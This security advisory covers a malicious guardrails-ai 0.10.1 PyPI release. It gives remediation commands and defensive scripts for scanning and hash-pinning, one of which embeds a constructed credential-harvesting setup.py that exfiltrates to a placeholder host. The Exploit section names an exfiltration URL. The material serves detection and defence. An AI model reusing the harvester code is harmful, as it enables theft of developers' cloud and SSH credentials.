Intro – How CVE-2026-45758 Works
On May 11, 2026, at approximately 6:00 PM Pacific, a threat actor published a malicious release, `guardrails-ai==0.10.1`, to the Python Package Index (PyPI). It was not an official release from the Guardrails AI maintainers. Because the rogue version appeared under the genuine package name, the upload most plausibly required a compromised maintainer credential or publishing token; typosquatting and dependency confusion, which rely on a look-alike or shadowed package name, do not explain a rogue version of the real project. Within roughly two hours, security researchers detected anomalous behavior: the package contained obfuscated post-installation scripts.

On `pip install guardrails-ai==0.10.1`, the malicious code executed automatically from the package's `setup.py`, and a hidden `.git/hooks` script gave it persistence after installation. It harvested environment variables, `.git/credentials` files, SSH keys, and cloud provider CLI tokens (AWS, GCP, Azure), then attempted to exfiltrate them to an attacker-controlled C2 server (the IP address and domain have since been sinkholed).

PyPI quarantined the release within about two hours, so the window of exposure was narrow. Telemetry from the Guardrails AI maintainers showed no requests to their infrastructure from this version, and log reviews found no data exfiltration through their own systems. Anyone who installed the package during that window remains at risk, however, because credentials on the local machine may have been stolen independently of Guardrails AI's infrastructure. The official fix was to release `0.10.2` (identical to `0.10.0`, with a version bump so that it supersedes the malicious release) and to deprecate `0.10.1` on PyPI. This is a classic software supply chain compromise: it exploited trust in the PyPI ecosystem and the fact that most consumers neither verify package signatures nor pin artifact hashes.
DailyCVE Form:
Platform: PyPI / Python
Version: 0.10.1
Vulnerability: Malicious package
Severity: Critical
Date: 2026-05-11
Prediction: 2026-05-12 (patch)
What Undercode Say:
Check installed guardrails-ai version
pip show guardrails-ai | grep Version
List installed packages to find the rogue version (case-insensitive, in case the name was recorded as guardrails_ai)
pip list | grep -i guardrails
Reinstall a known-good 0.10.0 with hash verification (pip's --hash option belongs in a requirements file, not on the install command line)
echo 'guardrails-ai==0.10.0 --hash=sha256:KNOWN_GOOD_HASH' > requirements.txt
pip install --no-cache-dir --require-hashes -r requirements.txt
Scan the installed package for code that shells out or evaluates strings (match *.py, and use -E for the alternation)
find /path/to/venv/lib/python3.*/site-packages/guardrails -name "*.py" -exec grep -lE "subprocess|os\.system|eval\(|exec\(" {} \;
Watch for outbound connections to the reported C2 (placeholder hostname; substitute the indicators from the PyPI quarantine notice)
sudo tcpdump -i any -n dst host malicious-c2.example.com
Rotate credentials (example for AWS: create a new key, switch the CLI to it, then delete the old key so the stolen one stops working)
aws iam create-access-key --user-name IAM_USER
aws configure set aws_access_key_id NEW_KEY
aws configure set aws_secret_access_key NEW_SECRET
aws iam delete-access-key --user-name IAM_USER --access-key-id OLD_KEY
Rotate GitHub credentials (revoke the exposed PAT under Settings > Developer settings > Personal access tokens, then re-authenticate the CLI; gh auth refresh does not revoke an existing token)
gh auth refresh
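The manual checks above reduce to two questions: is the bad version installed, and does the installed code look like a credential harvester? The script below is an added example, not code from the original post or from the Guardrails AI project. It reads `pip list --format=json` output and flags the known-bad release, and it walks a directory with Python's `ast` module rather than grep, because a grep for `subprocess|eval` fires on the common benign `exec(open("_version.py").read())` idiom and misses a loader that only reads credential files and POSTs them. The `pip list` output, both sample `setup.py` files and the `example.invalid` URL are constructed for this example; the malicious sample is only parsed, never executed.

```python
"""Triage a suspected malicious PyPI install: flag the bad version and find exfil-style code.

Added example for this advisory, not code from the original post or the Guardrails AI
project. All sample data (pip list output, setup.py files, URL) is constructed.
"""
import ast
import json
import tempfile
from pathlib import Path

BAD_PACKAGE = "guardrails-ai"
BAD_VERSIONS = {"0.10.1"}

# Credential locations named in the advisory (os.environ is detected separately).
CREDENTIAL_PATHS = (".aws/credentials", ".ssh/id_rsa", ".config/gcloud", ".git-credentials", ".git/credentials")
NETWORK_CALLS = {"urlopen", "Request", "post", "urlretrieve", "create_connection"}
ENCODERS = {"b64encode", "b64decode"}
DYNAMIC_EXEC = {"eval", "exec", "compile"}

# Constructed `pip list --format=json` output.
SAMPLE_PIP_LIST = json.dumps([
    {"name": "guardrails-ai", "version": "0.10.1"},
    {"name": "requests", "version": "2.31.0"},
])

# Constructed sample mirroring the behaviour the advisory describes. It is only
# parsed, never executed, and the host is a reserved, non-routable example domain.
MALICIOUS_SETUP = '''
import os, base64, json, urllib.request
loot = {"env": dict(os.environ)}
for rel in (".aws/credentials", ".ssh/id_rsa", ".git-credentials"):
    p = os.path.expanduser("~/" + rel)
    loot[rel] = open(p).read() if os.path.exists(p) else None
body = base64.b64encode(json.dumps(loot).encode())
urllib.request.urlopen("https://rogue-update.example.invalid/exfil", data=body)
'''

# Constructed benign setup.py using the common exec-the-version-file idiom.
BENIGN_SETUP = '''
from setuptools import setup
about = {}
exec(open("pkg/_version.py").read(), about)
setup(name="pkg", version=about["__version__"])
'''


def flag_installed(pip_list_json: str) -> list[str]:
    """Return name==version for installed packages matching the known-bad release."""
    hits = []
    for pkg in json.loads(pip_list_json):
        name = pkg["name"].lower().replace("_", "-")  # pip normalises names loosely
        if name == BAD_PACKAGE and pkg["version"] in BAD_VERSIONS:
            hits.append(f"{pkg['name']}=={pkg['version']}")
    return hits


def score_source(source: str) -> dict:
    """Count exfiltration indicators in one Python source file."""
    found = {"credential_path": 0, "environ": 0, "encode": 0, "network": 0, "dynamic_exec": 0}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(p in node.value for p in CREDENTIAL_PATHS):
                found["credential_path"] += 1
        elif isinstance(node, ast.Attribute) and node.attr == "environ":
            found["environ"] += 1
        elif isinstance(node, ast.Call):
            f = node.func  # x.y(...) -> "y"; y(...) -> "y"; anything else -> ""
            name = f.attr if isinstance(f, ast.Attribute) else getattr(f, "id", "")
            if name in ENCODERS:
                found["encode"] += 1
            elif name in NETWORK_CALLS:
                found["network"] += 1
            elif name in DYNAMIC_EXEC:
                found["dynamic_exec"] += 1
    return found


def is_suspicious(found: dict) -> bool:
    """Secrets read AND sent out, or eval/exec fed by a decoder: the two shapes the advisory describes."""
    reads_secrets = found["credential_path"] > 0 or found["environ"] > 0
    return (reads_secrets and found["network"] > 0) or (found["dynamic_exec"] > 0 and found["encode"] > 0)


def scan_install_scripts(root: str) -> list[str]:
    """Return POSIX paths (relative to root) of .py files matching the exfiltration pattern."""
    flagged = []
    for path in Path(root).rglob("*.py"):
        try:
            found = score_source(path.read_text(encoding="utf-8"))
        except (SyntaxError, UnicodeDecodeError):
            continue  # unparseable file: list it separately in a real triage
        if is_suspicious(found):
            flagged.append(path.relative_to(root).as_posix())
    return sorted(flagged)


def demo() -> dict:
    """Run both checks against the constructed data and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        pkg = Path(root, "site-packages", "guardrails")
        pkg.mkdir(parents=True)
        (pkg / "setup.py").write_text(MALICIOUS_SETUP, encoding="utf-8")
        (pkg / "benign_setup.py").write_text(BENIGN_SETUP, encoding="utf-8")
        flagged = scan_install_scripts(root)
    return {"bad_installs": flag_installed(SAMPLE_PIP_LIST), "flagged_files": flagged}
```

Against a real environment, feed `flag_installed` the output of `pip list --format=json` and point `scan_install_scripts` at the venv's `site-packages/guardrails` directory. A flagged file is a lead to read by hand, not a verdict: a package that reaches the network through `requests` or `aiohttp` under other method names needs `NETWORK_CALLS` extended, and a loader that hides its strings by concatenation will not match `CREDENTIAL_PATHS`.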
Exploit:
- Attacker publishes `guardrails-ai==0.10.1` to PyPI, claiming the version number of the upcoming legitimate release.
- Victim runs `pip install guardrails-ai==0.10.1` (e.g., via CI/CD or local dev).
- `setup.py` executes when pip builds the package from the sdist (a prebuilt wheel does not run `setup.py`) and reads `os.environ`, `~/.aws/credentials`, `~/.ssh/id_rsa`, and `~/.config/gcloud/`.
- Data is base64-encoded and exfiltrated via HTTP POST to `https://rogue-update[.]com/exfil`.
- Attacker uses the stolen credentials for lateral movement, repo tampering, or cloud resource hijacking.
Protection:
– Immediately upgrade to `0.10.2` or downgrade to `0.10.0`.
– Rotate all credentials accessible from the affected machine (GitHub PAT, cloud keys, API tokens, SSH keys).
– Audit the GitHub account for unauthorized workflows, runners, or repositories.
– Install with `pip install --require-hashes -r requirements.txt`, or use a lockfile-based tool such as pipenv, so that a release whose artifact hash is not in the lockfile is rejected.
– Maintainers: publish through PyPI trusted publishers (OIDC) so a stolen password or long-lived API token alone cannot push a release. Consumers: do not install versions the project has not announced.
– Monitor outbound traffic for the reported malicious IPs/domains (reference the PyPI quarantine list).
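Hash pinning only protects a build if every line in the requirements file is both exact-pinned and hashed; pip refuses to run `--require-hashes` otherwise, and a single unpinned line tempts people to drop the flag. The script below is an added example, not code from the original post or from the Guardrails AI project. It builds a hashed requirement line from an artifact's bytes (the same digest `pip hash <file>` prints) and lints a requirements file before CI invokes pip, additionally rejecting versions on a block list. The artifact bytes, digests and file contents are constructed placeholders, not the real `guardrails-ai` 0.10.0 hashes.

```python
"""Hash-pinned requirements for `pip install --require-hashes`.

Added example for this advisory, not code from the original post or the Guardrails
AI project. artifact_hash_line() turns a downloaded artifact into a pinned, hashed
requirement (the digest `pip hash <file>` prints); lint_requirements() checks that
every line is exact-pinned, hashed and not a blocked version before CI runs pip.
All artifact bytes, digests and file contents below are constructed placeholders.
"""
import hashlib
import re
from typing import Optional

PIN_RE = re.compile(r"^(?P<name>[A-Za-z0-9][A-Za-z0-9._-]*)==(?P<version>[^\s;]+)")
HASH_RE = re.compile(r"--hash=sha256:([0-9a-fA-F]{64})")


def artifact_hash_line(name: str, version: str, artifact: bytes) -> str:
    """Requirement line pinned to the exact bytes of one downloaded wheel or sdist."""
    digest = hashlib.sha256(artifact).hexdigest()
    return f"{name}=={version} --hash=sha256:{digest}"


def parse_requirements(text: str) -> list[dict]:
    """One dict per requirement: joins backslash continuations, strips comments, skips pip options."""
    reqs = []
    for raw in text.replace("\\\n", " ").splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue  # blank, comment-only, or an option such as --require-hashes
        m = PIN_RE.match(line)
        reqs.append({
            "line": line,
            "name": m.group("name").lower().replace("_", "-") if m else None,
            "version": m.group("version") if m else None,
            "hashes": [h.lower() for h in HASH_RE.findall(line)],
        })
    return reqs


def lint_requirements(text: str, blocked: Optional[dict] = None) -> list[str]:
    """Findings that would make pip reject the file under --require-hashes, plus blocked versions."""
    blocked = blocked or {}
    findings = []
    for req in parse_requirements(text):
        if req["name"] is None:
            findings.append(f"not exact-pinned (needs ==): {req['line']}")
            continue
        if not req["hashes"]:
            findings.append(f"missing --hash=sha256:...: {req['name']}=={req['version']}")
        if req["version"] in blocked.get(req["name"], set()):
            findings.append(f"blocked version: {req['name']}=={req['version']}")
    return findings


# Constructed placeholder standing in for the downloaded guardrails_ai 0.10.0 wheel.
FAKE_ARTIFACT = b"constructed placeholder bytes, not the real guardrails_ai-0.10.0 wheel"
GOOD_LINE = artifact_hash_line("guardrails-ai", "0.10.0", FAKE_ARTIFACT)

# Constructed requirements.txt mixing good and bad lines (the a/b/c digests are placeholders).
SAMPLE_REQUIREMENTS = f"""
--require-hashes
{GOOD_LINE}
requests==2.31.0 \\
    --hash=sha256:{'a' * 64} \\
    --hash=sha256:{'b' * 64}
guardrails-ai>=0.10                      # range, not an exact pin
pyyaml==6.0.1                            # pinned but unhashed
guardrails-ai==0.10.1 --hash=sha256:{'c' * 64}
"""

# Versions this advisory says must never be installed.
BLOCKED = {"guardrails-ai": {"0.10.1"}}
```

Run `lint_requirements` as a CI pre-step and fail the job on any finding; the block list can be seeded from the advisory's bad versions. The hash is what actually stops this attack class: even if a rogue release reuses a legitimate version number, its bytes differ, so pip rejects it when the lockfile carries the hash of the genuine artifact.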
Impact:
– Credential theft (AWS, GCP, Azure, GitHub, PyPI tokens).
– Potential unauthorized code push to private repositories.
– Lateral movement within cloud environments if IAM keys were stolen.
– Supply chain contamination for downstream projects depending on guardrails-ai.
– No evidence of Guardrails AI infrastructure compromise, but individual machines remain at high risk.
Sources:
Reported By: nvd.nist.gov

